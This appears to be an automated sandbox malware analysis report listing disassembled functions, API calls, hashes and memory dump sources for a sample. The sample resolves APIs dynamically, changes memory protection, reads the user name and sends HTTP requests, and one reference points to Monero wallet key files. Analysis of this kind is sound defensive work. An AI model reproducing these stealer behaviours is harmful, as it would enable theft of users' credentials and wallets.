15879->15880 15881 68522f 15880->15881 15882 6858c4 InternetCloseHandle 15881->15882 15883 698b60 3 API calls 15881->15883 15889 6858d9 ctype 15882->15889 15884 68524e 15883->15884 15885 69a920 3 API calls 15884->15885 15886 685261 15885->15886 15887 69a8a0 lstrcpy 15886->15887 15888 68526a 15887->15888 15890 69a9b0 4 API calls 15888->15890 15893 69a7a0 lstrcpy 15889->15893 15891 6852ab 15890->15891 15892 69a920 3 API calls 15891->15892 15894 6852b2 15892->15894 15901 685913 15893->15901 15895 69a9b0 4 API calls 15894->15895 15896 6852b9 15895->15896 15897 69a8a0 lstrcpy 15896->15897 15898 6852c2 15897->15898 15899 69a9b0 4 API calls 15898->15899 15900 685303 15899->15900 15902 69a920 3 API calls 15900->15902 15901->15847 15903 68530a 15902->15903 15904 69a8a0 lstrcpy 15903->15904 15905 685313 15904->15905 15906 685329 InternetConnectA 15905->15906 15906->15882 15907 685359 HttpOpenRequestA 15906->15907 15909 6858b7 InternetCloseHandle 15907->15909 15910 6853b7 15907->15910 15909->15882 15911 69a9b0 4 API calls 15910->15911 15912 6853cb 15911->15912 15913 69a8a0 lstrcpy 15912->15913 15914 6853d4 15913->15914 15915 69a920 3 API calls 15914->15915 15916 6853f2 15915->15916 15917 69a8a0 lstrcpy 15916->15917 15918 6853fb 15917->15918 15919 69a9b0 4 API calls 15918->15919 15920 68541a 15919->15920 15921 69a8a0 lstrcpy 15920->15921 15922 685423 15921->15922 15923 69a9b0 4 API calls 15922->15923 15924 685444 15923->15924 15925 69a8a0 lstrcpy 15924->15925 15926 68544d 15925->15926 15927 69a9b0 4 API calls 15926->15927 15928 68546e 15927->15928 16021 698ea9 16020->16021 16022 698ead CryptBinaryToStringA 16020->16022 16021->15866 16022->16021 16023 698ece GetProcessHeap RtlAllocateHeap 16022->16023 16023->16021 16024 698ef4 ctype 16023->16024 16025 698f05 CryptBinaryToStringA 16024->16025 16025->16021 16029->15304 16272 689880 16030->16272 16032 6898e1 16032->15311 16034 69a740 lstrcpy 16033->16034 16035 68fb16 16034->16035 16207 69a740 lstrcpy 16206->16207 16208 690266 16207->16208 16209 698de0 2 API calls 16208->16209 16210 69027b 16209->16210 16211 69a920 3 API calls 16210->16211 16212 69028b 16211->16212 16213 69a8a0 lstrcpy 16212->16213 16214 690294 16213->16214 16215 69a9b0 4 API calls 16214->16215 16273 68988d 16272->16273 16276 686fb0 16273->16276 16275 6898ad ctype 16275->16032 16279 686d40 16276->16279 16280 686d63 16279->16280 16294 686d59 16279->16294 16295 686530 16280->16295 16284 686dbe 16284->16294 16305 6869b0 16284->16305 16286 686e2a 16287 686ee6 VirtualFree 16286->16287 16289 686ef7 16286->16289 16286->16294 16287->16289 16288 686f41 16292 6989f0 2 API calls 16288->16292 16288->16294 16289->16288 16290 686f38 16289->16290 16291 686f26 FreeLibrary 16289->16291 16293 6989f0 2 API calls 16290->16293 16291->16289 16292->16294 16293->16288 16294->16275 16296 686542 16295->16296 16298 686549 16296->16298 16315 698a10 GetProcessHeap RtlAllocateHeap 16296->16315 16298->16294 16299 686660 16298->16299 16302 68668f VirtualAlloc 16299->16302 16301 686730 16303 68673c 16301->16303 16304 686743 VirtualAlloc 16301->16304 16302->16301 16302->16303 16303->16284 16304->16303 16306 6869c9 16305->16306 16310 6869d5 16305->16310 16307 686a09 LoadLibraryA 16306->16307 16306->16310 16308 686a32 16307->16308 16307->16310 16312 686ae0 16308->16312 16316 698a10 GetProcessHeap RtlAllocateHeap 16308->16316 16310->16286 16311 686ba8 GetProcAddress 16311->16310 16311->16312 16312->16310 16312->16311 16313 6989f0 2 API calls 16313->16312 16314 686a8b 16314->16310 16314->16313 16315->16298 16316->16314

                            Executed Functions

                            Function 00699860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 699860-699874 call 699750 663 69987a-699a8e call 699780 GetProcAddress * 21 660->663 664 699a93-699af2 LoadLibraryA * 5 660->664 663->664 665 699b0d-699b14 664->665 666 699af4-699b08 GetProcAddress 664->666 668 699b46-699b4d 665->668 669 699b16-699b41 GetProcAddress * 2 665->669 666->665 671 699b68-699b6f 668->671 672 699b4f-699b63 GetProcAddress 668->672 669->668 673 699b89-699b90 671->673 674 699b71-699b84 GetProcAddress 671->674 672->671 675 699bc1-699bc2 673->675 676 699b92-699bbc GetProcAddress * 2 673->676 674->673 676->675
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013A05E8), ref: 006998A1
                            • GetProcAddress.KERNEL32(75900000,013A0570), ref: 006998BA
                            • GetProcAddress.KERNEL32(75900000,013A0810), ref: 006998D2
                            • GetProcAddress.KERNEL32(75900000,013A0828), ref: 006998EA
                            • GetProcAddress.KERNEL32(75900000,013A0780), ref: 00699903
                            • GetProcAddress.KERNEL32(75900000,013A8A10), ref: 0069991B
                            • GetProcAddress.KERNEL32(75900000,013967A0), ref: 00699933
                            • GetProcAddress.KERNEL32(75900000,01396980), ref: 0069994C
                            • GetProcAddress.KERNEL32(75900000,013A0708), ref: 00699964
                            • GetProcAddress.KERNEL32(75900000,013A05B8), ref: 0069997C
                            • GetProcAddress.KERNEL32(75900000,013A06D8), ref: 00699995
                            • GetProcAddress.KERNEL32(75900000,013A07B0), ref: 006999AD
                            • GetProcAddress.KERNEL32(75900000,013967C0), ref: 006999C5
                            • GetProcAddress.KERNEL32(75900000,013A0840), ref: 006999DE
                            • GetProcAddress.KERNEL32(75900000,013A0558), ref: 006999F6
                            • GetProcAddress.KERNEL32(75900000,013967E0), ref: 00699A0E
                            • GetProcAddress.KERNEL32(75900000,013A05D0), ref: 00699A27
                            • GetProcAddress.KERNEL32(75900000,013A0600), ref: 00699A3F
                            • GetProcAddress.KERNEL32(75900000,01396A20), ref: 00699A57
                            • GetProcAddress.KERNEL32(75900000,013A0618), ref: 00699A70
                            • GetProcAddress.KERNEL32(75900000,01396740), ref: 00699A88
                            • LoadLibraryA.KERNEL32(013A0720,?,00696A00), ref: 00699A9A
                            • LoadLibraryA.KERNEL32(013A0690,?,00696A00), ref: 00699AAB
                            • LoadLibraryA.KERNEL32(013A0738,?,00696A00), ref: 00699ABD
                            • LoadLibraryA.KERNEL32(013A0678,?,00696A00), ref: 00699ACF
                            • LoadLibraryA.KERNEL32(013A0660,?,00696A00), ref: 00699AE0
                            • GetProcAddress.KERNEL32(75070000,013A0648), ref: 00699B02
                            • GetProcAddress.KERNEL32(75FD0000,013A06A8), ref: 00699B23
                            • GetProcAddress.KERNEL32(75FD0000,013A8FB8), ref: 00699B3B
                            • GetProcAddress.KERNEL32(75A50000,013A8F28), ref: 00699B5D
                            • GetProcAddress.KERNEL32(74E50000,01396720), ref: 00699B7E
                            • GetProcAddress.KERNEL32(76E80000,013A8A90), ref: 00699B9F
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00699BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00699BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                            • Instruction ID: e90d11b9e75d8bcb3970622a30c118ad49fa7be448549b50bdb3eeca76e73b76
                            • Opcode Fuzzy Hash: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                            • Instruction Fuzzy Hash: 9CA12CB550024C9FD34CEFA8FD88E663BF9F74C309B14852AA646C3264D7399852CB66
                            Function 006845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 6845c0-684695 RtlAllocateHeap 781 6846a0-6846a6 764->781 782 6846ac-68474a 781->782 783 68474f-6847a9 VirtualProtect 781->783 782->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068460E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0068479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845C7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 448e4dc9751de81d7d169ba69f590b986011d0186bc916c377c885265cc6aa99
                            • Instruction ID: f755fa716f5246bb909c964c4b16ab1c5f728e750e91e62cf2b828ed54f0fdc6
                            • Opcode Fuzzy Hash: 448e4dc9751de81d7d169ba69f590b986011d0186bc916c377c885265cc6aa99
                            • Instruction Fuzzy Hash: DC4116257CA7047FCE26F7A4884EE9D77975F4B700F515346A80152296EBB06B40CD26
                            Function 00684880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 684880-684942 call 69a7a0 call 6847b0 call 69a740 * 5 InternetOpenA StrCmpCA 816 68494b-68494f 801->816 817 684944 801->817 818 684ecb-684ef3 InternetCloseHandle call 69aad0 call 689ac0 816->818 819 684955-684acd call 698b60 call 69a920 call 69a8a0 call 69a800 * 2 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a920 call 69a8a0 call 69a800 * 2 InternetConnectA 816->819 817->816 828 684f32-684fa2 call 698990 * 2 call 69a7a0 call 69a800 * 8 818->828 829 684ef5-684f2d call 69a820 call 69a9b0 call 69a8a0 call 69a800 818->829 819->818 905 684ad3-684ad7 819->905 829->828 906 684ad9-684ae3 905->906 907 684ae5 905->907 908 684aef-684b22 HttpOpenRequestA 906->908 907->908 909 684b28-684e28 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a9b0 call 69a8a0 call 69a800 call 69a920 call 69a8a0 call 69a800 call 69a740 call 69a920 * 2 call 69a8a0 call 69a800 * 2 call 69aad0 lstrlen call 69aad0 * 2 lstrlen call 69aad0 HttpSendRequestA 908->909 910 684ebe-684ec5 InternetCloseHandle 908->910 1021 684e32-684e5c InternetReadFile 909->1021 910->818 1022 684e5e-684e65 1021->1022 1023 684e67-684eb9 InternetCloseHandle call 69a800 1021->1023 1022->1023 1024 684e69-684ea7 call 69a9b0 call 69a8a0 call 69a800 1022->1024 1023->910 1024->1021
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00684915
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 0068493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00684ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006A0DDB,00000000,?,?,00000000,?,",00000000,?,013AE340), ref: 00684DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00684E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00684E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00684E49
                            • InternetCloseHandle.WININET(00000000), ref: 00684EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00684EC5
                            • HttpOpenRequestA.WININET(00000000,013AE3A0,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00684B15
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • InternetCloseHandle.WININET(00000000), ref: 00684ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                            • Instruction ID: 1e9272e0a36d166422f7eb91f374de04df4d18a0dada76f0fdc1716fc02316af
                            • Opcode Fuzzy Hash: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                            • Instruction Fuzzy Hash: 6912E971921118AADF54EB90DD92FEEB3BEBF15300F50419DB10662491EF702E49CFAA
                            Function 00697850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
                            • Instruction ID: d0f13dbc10b9badc13b40dbe5546ec74484ece50901d10e400492ba806b8e903
                            • Opcode Fuzzy Hash: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
